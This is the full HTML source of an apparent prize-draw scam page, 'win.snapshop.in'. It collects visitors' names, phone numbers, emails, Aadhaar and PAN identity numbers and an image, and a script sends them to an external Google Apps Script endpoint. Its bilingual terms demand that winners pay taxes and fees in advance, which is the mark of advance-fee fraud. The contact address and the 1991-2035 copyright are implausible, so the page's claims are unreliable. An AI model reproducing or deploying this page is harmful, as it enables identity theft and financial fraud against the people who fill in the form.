<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="favicon/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
  
  <style type="text/css" media="all">
    *{
      margin: 0;
      padding: 0;
    }
    th{
      padding: 10px;
      font-size: 35px;
      
    }
    a{
      text-decoration: none;
      color: white;
    }
    h1{
      font-size: 40px;
      color: white;
    }
    body{
      font-family: Times New Roman;
      background-color: white;
    }
    form{
      height: 950px;
      padding: 9px;
      margin: 90px;
      font-size: 40px;
      border: 0px solid;
      border-radius: 39px;
      background-image: url(111.jpg);
    }
      input{
        width: 47%;
        height: 36px;
        padding: 10px;
        font-size: 40px;
        border-radius: 16px;
        border-bottom-color: black;
      }
      #submit{
        width: 18%;
        height: 8%;
      }
      #reset{
        width: 17%;
        height: 8%;
        
      }
      h2{
        font-family: Times New Roman;
      }
      #baby{
        background-color: white;
      }
     p{
        font-family:  Helvetica;
        background-color: white;
      }
      marquee{
        background-color: white;
      }
      h5{
        font-size: 60px;
        background-color: white;
        font-family: Arial;
      }
      h2,h4{
        font-family:Times New Roman;
        margin-left: 15px;
      }
      address{
        font-family: Helvetica;
        margin-left: 30px;
      }
      address a{
        color: blue;
      }
  </style>
  <title>
    win.snapshop.in
</title>
</head>
<body>
  <table border="0" width="100%" bgcolor="darkred">
    <hr>
    <tr>
      <th width="20%"align="center">
        <a href="index.html">Home</a>
        </th>
      <th width="20%">
        <a href="About.html">About</a>
        </th>
      <th width="20%"> <a href="ilu.html">Draw</a>
      </th>
      <th width="22%"><a href="#">Contact Us</a>
      </th>
      <th width="20%"> <a href="tc.html">T & C</a>
      </th>
      </th>
    </tr>
  </table>
    <h5 align="center">Free Draw Products <br /><br />
    </h5>
    <marquee behaviour="scroll" scrollamount="16">
      <img src="2.jpg" alt="Mobile" height="400px"/>
      <img src="5.jpg" alt="Television" height="400px"/>
      <img src="3.jpg" alt="Laptop" height="400px" />
      <img src="4.jpg" alt="fridge" height="400px" />
       <img src="ac.jpeg" alt="AC" height="30%" align="top" width="50%"/>
       <img src="1.jpg" alt="Heater" height="400px" />
     </marquee>
  
  <div id="baby">
    <form name="google-sheet" method="post" accept-charset="utf-8" align="center">
      <h1 align="center">
        <br />
    ::: Check Your Luck Here :::
    </h1>
    <br />
    <label for="usrname">: Your Name :</label><br />
    <input type="text" name="usrname" value="" class="arya" placeholder="Enter Your Name" maxlength="15" required/><br />
    <label for="mobile number">: Mobile Number : </label> <br />
    <input type="text" name="usrtel" value="" placeholder="Enter Your Mobile Number" id="prav" pattern="[0-9]{10}"maxlength="10" required/><br />
    <label for="e-mail">: E-Mail :</label><br />
    <input type="text" name="usrmail" id="" value="" placeholder="Enter Your e-mail" required/><br />
    <label for="Aadhar Number">: UIDAI No :</label><br />
    <input type="text" name="usruidai" id="" value="" placeholder="Aadhar Number" pattern="[0-9]{12}" maxlength="12" required/>
    <br />
    <label for="pan:">: PAN No :</label><br />
    <input type="text" name="usrpan" value="" placeholder="PAN Number" maxlength="10" required/>
    <br /><br />
     <input type="file" name="usrimage" id="SUNNY" value="usrimage" onchange="readURL(this)" accept="image/*"/>
    <br /> <br />
    <input type="submit" name="submit" id="submit" value="Submit" />
     <input type="reset" name="reset" id="reset" value="Reset" />
  </form>
  </div>
  <span>
    <h5 align="center">Other Products</h5><br />
    <marquee behaviour="scroll" scrollamount="15">
      <img src="110.jpeg" alt="Bike" height="600px"/>
      <img src="car.jpg" alt="Car" height="600px"/>
      <img src="str.jpeg" alt="Scooter" height="600px" />
      <img src="bt.jpeg" alt="boAt" height="600px" />
      <img src="wt.jpeg" alt="Watch" height="600px" />
     </marquee>
     <br />
     <h2> :: Contact Us ::</h2>
     <br />
     <address>
       SnapShop @ <br />
       350,5th Avenue,<br />
       New York,USA, <br />
       New York, <br />
       10118,<br />
      <a href="https://wa.me/17077225554">(707) 722 5554</a> <br />
      <a href="mailto:feedback.snapshop@gmail.com">feedback@snapshop.com</a>
     </address>
     <br /><br />
     <p>
       
     </p>
  </span>
    <h2 align="center">
        Terms and Conditions For prize
      </h2>
 
    <p align="justify">
      <br />
      * The cash money of the prize will directly credits to your Bank Account only.<br /><br />
      * ईनाम का पुरा नगद सीधे आपके बैंक खाते मे जायेगा।
<br /><br />
* All the Govt. taxes and processing fee shall be paid by the winner.<br /><br />
* सारे सरकारी कर और प्रक्रिया शुल्क ग्राहक (विजेता) को ही देना पड़ेगा।
<br /><br />
* All the fees should be taken from the winner in prior from the customer and shall not be adjusted with the prize money.
<br /><br />
* सारे शुल्क विजेता से अग्रिम में एकत्रित किया जाएगा और किसी भी हालत में ऐ ईनाम की राशि के साथ एडजस्ट नहीं किया जाएगा।
<br /><br />
* The result shall be final and should be acceptable.<br /><br />
* परिणाम का निर्णय अंतिम एवं गैर विवादित होगा
<br /><br />
* There shall be no deduction in the prize money.<br /><br />
* इनामी राशि में कोई भी कटौती नहीं की जाएगी
<br /><br />
* The prize cannot be changed as per customer.<br /><br />
* इनाम आपकी इच्छा अनुसार नहीं बदल सकते
<br /><br />
* The company employees cannot participate in this competition.<br /><br />
* इस प्रतियोगिता में कंपनी का कोई भी सदस्य भाग नहीं ले सकते हैं , ना ही मदद कर सकते हैं
<br /><br />
* The taxes and fees shall be paid by customer only.<br /><br />
* इनाम में अगर कोई फीस या टैक्स लगता है तो वो विजेता को ही देना पड़ेगा
<br /><br />
* If after depositing money customer doesn't gets money then company will be responsible.<br /><br />
* अगर पैसा जमा करवाने के बाद इनाम नहीं मिलता है तो उसका जिम्मेदार कंपनी होगा
<br /><br />
* Any discrepancy will be heard in Court <br /><br />
* कोई भी वाद विवाद न्यायालय में किया जायेगा
<br /><br />
<p align="center">
  SnapShop &copy; 1991-2035 win.snapshop
  <p align="center" style="color:gray">
  All Rights Reserved.
  </p>
</p>
      </p>
<!--Start of Tawk.to Script -->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/61503a3c25797d7a8900ddf3/1fggm6vlm';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!-- End of Tawk.to Script-->

<!-- Live Chat
<script>(function(){var pp=document.createElement('script'), ppr=document.getElementsByTagName('script')[0]; stid='S1NFWmpRRXU3WGpFMzZ1U3Y5MFhpUT09';pp.type='text/javascript'; pp.async=true; pp.src=('https:' == document.location.protocol ? 'https://' : 'http://') + 's01.live2support.com/dashboardv2/chatwindow/'; ppr.parentNode.insertBefore(pp, ppr);})();</script>
Live chat End -->

<!--Form Script Start -->
          <script>
            const scriptURL = 'https://script.google.com/macros/s/AKfycbwLh3L3jwiDmjfGScYy6fQvF1uLPsnEW6kIF5NE84-1uzf61wME/exec'
            const form = document.forms['google-sheet']
          
            form.addEventListener('submit', e => {
              e.preventDefault()
              fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                .then(response => alert("Thanks for Contacting us..! We Will Contact You Soon..."))
                .catch(error => console.error('Error!', error.message))
            })
          </script>

        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

<!--End Of Form Script-->
  </body>
</html>